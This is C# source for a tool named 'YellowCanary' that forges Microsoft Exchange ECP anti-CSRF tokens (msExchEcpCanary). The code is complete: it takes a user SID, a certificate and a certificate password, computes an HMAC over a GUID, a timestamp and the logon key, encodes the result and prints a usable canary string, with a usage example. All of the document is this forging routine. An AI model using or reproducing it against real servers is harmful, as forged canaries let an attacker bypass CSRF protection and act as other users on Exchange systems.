private byte[] ComputeHash(byte[] userContextIdBinary, byte[] timeStampBinary, string logonUniqueKey, out string logData) { Canary15.CanaryKind canaryKind = Canary15.GetCanaryKind(timeStampBinary); byte[] result; byte[] bytes = new UnicodeEncoding().GetBytes(logonUniqueKey); result = this.ComputeHmac(new byte[][] { userContextIdBinary, timeStampBinary, bytes }); logData = Canary15.FormatLogData(canaryKind); return(result); }
public Canary15(string logonUniqueKey, string certpath, string certpass, Canary15.CanaryKind canaryKind) { this.certpath = certpath; this.certpass = certpass; byte[] userContextIdBinary = Guid.NewGuid().ToByteArray(); byte[] timeStampBinary = Canary15.BinaryFromTicksKindScope(DateTime.UtcNow.Ticks, canaryKind); string logData; byte[] hashBinary = this.ComputeHash(userContextIdBinary, timeStampBinary, logonUniqueKey, out logData); this.Init(userContextIdBinary, timeStampBinary, logonUniqueKey, hashBinary, logData); this.IsRenewed = true; this.IsAboutToExpire = false; }
private void Init(byte[] userContextIdBinary, byte[] timeStampBinary, string logonUniqueKey, byte[] hashBinary, string logData) { long canaryTicks = Canary15.GetCanaryTicks(timeStampBinary); this.kind = Canary15.GetCanaryKind(timeStampBinary); this.CreationTime = new DateTime(canaryTicks, DateTimeKind.Utc); this.IsRenewed = false; this.IsAboutToExpire = Canary15.IsNearExpiration(canaryTicks); byte[] array = new byte[userContextIdBinary.Length + timeStampBinary.Length + hashBinary.Length]; userContextIdBinary.CopyTo(array, 0); timeStampBinary.CopyTo(array, userContextIdBinary.Length); hashBinary.CopyTo(array, userContextIdBinary.Length + timeStampBinary.Length); this.UserContextId = new Guid(userContextIdBinary).ToString("N"); this.LogonUniqueKey = logonUniqueKey; this.canaryString = Canary15.Encode(array); this.LogData = logData; }
static void Main(string[] args) { String header = @" #==================================================== # YellowCanary - generate msExchEcpCanary csrf tokens #==================================================== "; Console.WriteLine(header); if (args.Length < 3) { Console.WriteLine("Usage: {0} <sid> <cert> <certpass>", AppDomain.CurrentDomain.FriendlyName); Console.WriteLine("Eg: {0} S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax", AppDomain.CurrentDomain.FriendlyName); return; } Canary15 csrf = new Canary15(args[0], args[1], args[2]); Console.WriteLine("security identifier : {0}", args[0]); Console.WriteLine("msExchEcpCanary : {0}", csrf.canaryString); }